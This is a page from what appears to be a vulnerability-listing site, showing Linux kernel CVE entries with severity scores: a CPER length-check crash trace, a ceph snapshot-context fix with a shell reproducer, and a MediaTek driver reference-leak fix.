x0 : 0000000000000008 Call trace: hex_dump_to_buffer+0x30c/0x4a0 (P) print_hex_dump+0xac/0x170 cper_estatus_print_section+0x90c/0x968 cper_estatus_print+0xf0/0x158 __ghes_print_estatus+0xa0/0x148 ghes_proc+0x1bc/0x220 ghes_notify_hed+0x5c/0xb8 notifier_call_chain+0x78/0x148 blocking_notifier_call_chain+0x4c/0x80 acpi_hed_notify+0x28/0x40 acpi_ev_notify_dispatch+0x50/0x80 acpi_os_execute_deferred+0x24/0x48 process_one_work+0x15c/0x3b0 worker_thread+0x2d0/0x400 kthread+0x148/0x228 ret_from_fork+0x10/0x20 Code: 6b14033f 540001ad a94707e2 f100029f (b8747b44) ---[ end trace 0000000000000000 ]--- Prevent that by taking the actual allocated are into account when checking for CPER length. [ rjw: Subject tweaks ]

Information Disclosure Linux Red Hat Suse
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43273 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: ceph: supply snapshot context in ceph_zero_partial_object() The ceph_zero_partial_object function was missing proper snapshot context for its OSD write operations, which could lead to data inconsistencies in snapshots. Reproducer: ../src/vstart.sh --new -x --localhost --bluestore ./bin/ceph auth caps client.fs_a mds 'allow rwps fsname=a' mon 'allow r fsname=a' osd 'allow rw tag cephfs data=a' mount -t ceph fs_a@.a=/ /mnt/mycephfs/ -o conf=./ceph.conf dd if=/dev/urandom of=/mnt/mycephfs/foo bs=64K count=1 mkdir /mnt/mycephfs/.snap/snap1 md5sum /mnt/mycephfs/.snap/snap1/foo fallocate -p -o 0 -l 4096 /mnt/mycephfs/foo echo 3 > /proc/sys/vm/drop/caches md5sum /mnt/mycephfs/.snap/snap1/foo # get different md5sum!!

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43270 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: media: mtk-mdp: Fix a reference leak bug in mtk_mdp_remove() In mtk_mdp_probe(), vpu_get_plat_device() increases the reference count of the returned platform device. Add platform_device_put() to prevent reference leak.

Information Disclosure Linux Red Hat Suse
NVD
CVSS 3.1
5.5
EPSS
0.0%
Page 1 of 6 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy